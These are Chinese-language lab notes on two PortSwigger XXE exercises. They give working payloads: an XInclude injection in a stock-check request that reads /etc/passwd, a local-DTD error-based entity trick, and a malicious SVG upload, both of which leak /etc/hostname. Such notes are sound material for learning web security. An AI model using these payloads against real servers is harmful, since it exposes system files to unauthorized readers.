### XInclude ###
https://portswigger.net/web-security/xxe/lab-xinclude-attack
注入点在库存检查功能
POST /product/stock HTTP/2

productId=1&storeId=1

添加XInclude命名空间及其文件引用
productId=1<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>&storeId=1

@ XInclude的属性parse默认加载文件为xml @

### 文件上传 ###
https://portswigger.net/web-security/xxe/lab-xxe-via-file-upload
注入点为评论区的头像上传功能
@ svg使用XML编码@

找到一个示例svg图像
<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" width="45" height="45" viewBox="0 0 45 45">
<rect width="45" height="45" fill="#5b4fff"/>
<polygon points="24.25 38.75 20.75 38.75 20.75 33.57 25.46 27.76 20.75 27.76 20.75 20.72 12.23 20.72 20.75 10.2 20.75 6.25 24.25 6.25 24.25 11.43 19.55 17.24 24.25 17.24 24.25 24.28 32.77 24.28 24.25 34.8 24.25 38.75" fill="#fff"/>
</svg>

# 使用本地DTD盲注，将注入内容放在svg元素外 #
检查DTD文件是否存在
<!DOCTYPE foo [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
%local_dtd;
]>
存在

重定义本地DTD文件的实体并加载
<!DOCTYPE foo [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
<!ENTITY % ISOamso '
<!ENTITY &#x25; file SYSTEM "file:///etc/hostname">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///foobaronexistent/&#x25;file;&#x27;>">
&#x25;eval;
&#x25;error;
'>
%local_dtd;
]>
从引发的错误信息中得到hostname

@ 示例答案：使用svg中text可包含字符的功能，定义外部实体后，在text元素中引用外部实体
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" version="1.1">
<text font-size="16" x="0" y="16">&xxe;</text></svg>
@ 